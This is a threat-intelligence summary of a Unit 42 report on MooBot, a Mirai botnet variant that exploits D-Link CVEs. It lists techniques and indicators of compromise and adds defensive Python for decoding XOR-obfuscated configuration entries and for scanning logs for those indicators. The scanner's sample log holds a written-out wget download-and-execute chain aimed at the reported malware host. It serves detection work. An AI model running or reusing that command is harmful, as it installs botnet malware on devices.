Mirai Variant MooBot Targeting D-Link Devices

Unit 42 researchers describe MooBot, a Mirai variant that exploits four D-Link vulnerabilities to take control of exposed devices and enlist them in a DDoS botnet. The campaign downloads MooBot from a remote host and communicates with a C2 server; the sample carries a random-string generator and encrypted configuration data. #MooBot #D-Link

Keypoints

  • MooBot is a Mirai variant that targets D-Link devices running Linux.
  • The attack chain exploits four CVEs (CVE-2015-2051, CVE-2018-6530, CVE-2022-26258, CVE-2022-28958) to achieve remote code execution and initial access.
  • Successful exploitation runs a wget-based downloader script (wget.sh) that fetches MooBot binaries from the attacker's host and executes them.
  • MooBot establishes command-and-control communications and can instruct compromised devices to carry out DDoS against specified targets.
  • The malware uses a random-string generator, prints “get haxored!” on execution, and deletes its own binary after spawning processes.
  • MooBot obfuscates its configuration data with the single-byte XOR key 0x22 (the leaked Mirai source instead hard-codes the 32-bit table key 0xDEADBEEF) and decodes that configuration at runtime to recover the C2 server (vpn.komaru.today).
  • Palo Alto Networks offers protections via IoT Security, WildFire, URL Filtering, DNS Security and Threat Prevention signatures, plus ML-based anomaly detection.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attacker exploits four D-Link vulnerabilities that could lead to remote code execution. [“The attacker utilizes four D-Link vulnerabilities that could lead to remote code execution.”]
  • [T1105] Ingress Tool Transfer – The attacker uses wget to download MooBot payloads from a remote host and execute them. [“The wget utility executes to download MooBot samples from the malware infrastructure and then executes the downloaded binaries.”]
  • [T1071.001] Web Protocols – The malware communicates with a C2 server to receive commands and send heartbeat messages to control DDoS actions. [“The malware will also send heartbeat messages to the C2 server and parse commands from C2 to start a DDoS attack.”]
  • [T1027] Obfuscated Files or Information – MooBot obfuscates its configuration data with the XOR key 0x22 rather than Mirai's key. [“MooBot encrypts its data with 0x22.”]
  • [T1070.004] Indicator Removal: File Deletion – The malware deletes the downloaded executable from disk after it has started running. [“wipes out the executable file.”]
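The configuration encoding mentioned in the keypoints and under T1027, as an added worked example (not code from the Unit 42 report or from the MooBot or Mirai samples): it decodes Mirai-style XOR-obfuscated table entries with the reported 0x22 key. The slot numbers and the obfuscated table are constructed for the example; only the C2 domain value comes from the report. The example also shows why the 0x22 key is less distinctive than it sounds: Mirai's toggle_obf() XORs each byte with the four bytes of table_key 0xDEADBEEF in turn, and 0xDE ^ 0xAD ^ 0xBE ^ 0xEF is 0x22, so a decoder written for one family decodes the other.

```python
"""Decode Mirai-style XOR-obfuscated configuration entries.

Added example (not code from the Unit 42 report or from the MooBot/Mirai
binaries). The table layout, slot numbers and sample entries are constructed
to illustrate the scheme; only the C2 domain value comes from the report.
"""

# The leaked Mirai source hard-codes table_key = 0xDEADBEEF and obfuscates
# every byte by XORing it with each of the four key bytes in turn.
MIRAI_TABLE_KEY = 0xDEADBEEF
# Single-byte key the report attributes to MooBot's configuration data.
MOOBOT_KEY = 0x22

# Constructed slot identifiers (Mirai numbers its table slots; these values
# are assumptions for the example, not the real slot numbers).
TABLE_CNC_DOMAIN = 1
TABLE_CNC_PORT = 2

# Constructed obfuscated table, in the form a Mirai-style add_entry() produces
# with key 0x22: every value byte, including the trailing NUL of a string,
# is XORed with the key (so a NUL becomes 0x22).
SAMPLE_TABLE = {
    TABLE_CNC_DOMAIN: bytes.fromhex("54524c0c494d4f4350570c564d46435b22"),  # "vpn.komaru.today\0"
    TABLE_CNC_PORT: bytes.fromhex("2235"),                                  # 0x0017 = port 23
}


def effective_byte_key(table_key: int) -> int:
    """Collapse Mirai's four successive single-byte XORs into one key byte.

    XOR is associative, so b ^ k1 ^ k2 ^ k3 ^ k4 == b ^ (k1 ^ k2 ^ k3 ^ k4).
    """
    k = 0
    for shift in (0, 8, 16, 24):
        k ^= (table_key >> shift) & 0xFF
    return k


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply (or undo; the transform is its own inverse) a single-byte XOR."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    return bytes(b ^ key for b in data)


def decode_string_entry(raw: bytes, key: int = MOOBOT_KEY) -> str:
    """Decode a NUL-terminated string entry, dropping the terminator."""
    plain = xor_bytes(raw, key)
    return plain.split(b"\x00", 1)[0].decode("latin-1")


def decode_port_entry(raw: bytes, key: int = MOOBOT_KEY) -> int:
    """Decode a 16-bit port entry stored in network (big-endian) byte order."""
    plain = xor_bytes(raw, key)
    if len(plain) != 2:
        raise ValueError("port entry must be exactly two bytes")
    return int.from_bytes(plain, "big")


def decode_table(table: dict[int, bytes], key: int = MOOBOT_KEY) -> dict[int, object]:
    """Decode every entry; the port slot is numeric, everything else a string."""
    decoded: dict[int, object] = {}
    for slot, raw in table.items():
        if slot == TABLE_CNC_PORT:
            decoded[slot] = decode_port_entry(raw, key)
        else:
            decoded[slot] = decode_string_entry(raw, key)
    return decoded


if __name__ == "__main__":
    print("Mirai 0xDEADBEEF collapses to byte key 0x%02x" % effective_byte_key(MIRAI_TABLE_KEY))
    for slot, value in decode_table(SAMPLE_TABLE).items():
        print(slot, value)
```

Because the transform is its own inverse, the same function re-encodes a config, which is handy when writing a YARA or scanner rule for the obfuscated form of a known C2 string.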

Indicators of Compromise

  • [Domain] C2 domain – vpn.komaru.today
  • [IP Address] Malware hosting/downloader – 159.203.15.179 (used to host MooBot payloads such as wget.sh and related artifacts)
  • [URL] Download and payload endpoints – http://159.203.15.179/wget.sh, http://159.203.15.179/wget.sh3
  • [File Name] Downloader and samples – rt, wget.sh
  • [SHA256] MooBot artifacts – B7EE57A42C6A4545AC6D6C29E1075FA1628E1D09B8C1572C848A70112D4C90A1, 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07CFAE075
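A small detection pass over the indicators above, as an added example (not code from the Unit 42 report): it flags DNS, proxy and process-execution log lines that reference the C2 domain, the payload host or its download URLs, reports which source addresses touched them, and compares observed file hashes against the reported SHA256 values. The log lines and their field names (src=, qname=, url=, cmd=) are constructed for the example; the indicator values are the ones listed above.

```python
"""Match the reported MooBot indicators against log lines and file hashes.

Added example, not code from the Unit 42 report. The indicator values are the
ones the report lists; the log lines and the hash inputs are constructed.
"""
import re

C2_DOMAINS = {"vpn.komaru.today"}
PAYLOAD_HOSTS = {"159.203.15.179"}
PAYLOAD_URLS = {"http://159.203.15.179/wget.sh", "http://159.203.15.179/wget.sh3"}
SAMPLE_SHA256 = {
    "b7ee57a42c6a4545ac6d6c29e1075fa1628e1d09b8c1572c848a70112d4c90a1",
    "46bb6e2f80b6cb96ff7d0f78b3bdbc496b69eb7f22ce15efcaa275f07cfae075",
}

# Constructed log lines (field names are assumptions): a DNS query, an egress
# proxy record, a benign lookup, and a process log showing the wget chain.
SAMPLE_LOG = """\
2022-09-06T10:01:02Z dns query src=10.0.0.15 qname=vpn.komaru.today qtype=A
2022-09-06T10:01:03Z proxy src=10.0.0.15 method=GET url=http://159.203.15.179/wget.sh status=200
2022-09-06T10:01:04Z dns query src=10.0.0.16 qname=updates.example.net qtype=A
2022-09-06T10:01:05Z exec src=10.0.0.15 cmd="cd /tmp; wget http://159.203.15.179/wget.sh3 -O rt; chmod +x rt; ./rt"
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def scan_line(line: str) -> list[tuple[str, str]]:
    """Return (indicator kind, value) pairs found on one log line.

    Domain and IP matches are bounded so that e.g. a longer hostname or a
    different address sharing a prefix does not produce a false hit.
    """
    hits: list[tuple[str, str]] = []
    lowered = line.lower()
    for dom in C2_DOMAINS:
        if re.search(r"(?<![\w.-])" + re.escape(dom) + r"(?![\w-])", lowered):
            hits.append(("c2_domain", dom))
    for url in URL_RE.findall(line):
        url = url.rstrip(".,;)")
        if url in PAYLOAD_URLS:
            hits.append(("payload_url", url))
    for ip in PAYLOAD_HOSTS:
        if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", line):
            hits.append(("payload_host", ip))
    return hits


def scan_log(text: str) -> list[tuple[int, str, str]]:
    """Scan every line; return (line number, kind, value) for each hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, value in scan_line(line):
            findings.append((lineno, kind, value))
    return findings


def compromised_hosts(text: str) -> set[str]:
    """Source addresses (src= field assumed) that touched any indicator."""
    hosts = set()
    for line in text.splitlines():
        if scan_line(line):
            m = re.search(r"\bsrc=(\S+)", line)
            if m:
                hosts.add(m.group(1))
    return hosts


def match_hashes(observed: list[str]) -> set[str]:
    """Case-insensitive comparison against the reported SHA256 values."""
    return {h.lower() for h in observed if h.lower() in SAMPLE_SHA256}


if __name__ == "__main__":
    for lineno, kind, value in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {kind} {value}")
    print("hosts to isolate:", sorted(compromised_hosts(SAMPLE_LOG)))
```

Hash and URL matching only catches samples the report already describes; the domain and host checks are the durable part of this list, since a re-packed binary changes its hash but still has to reach its C2.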

Read more: https://unit42.paloaltonetworks.com/moobot-d-link-devices/?web_view=true#post-124794-_73lw4g4a4pw2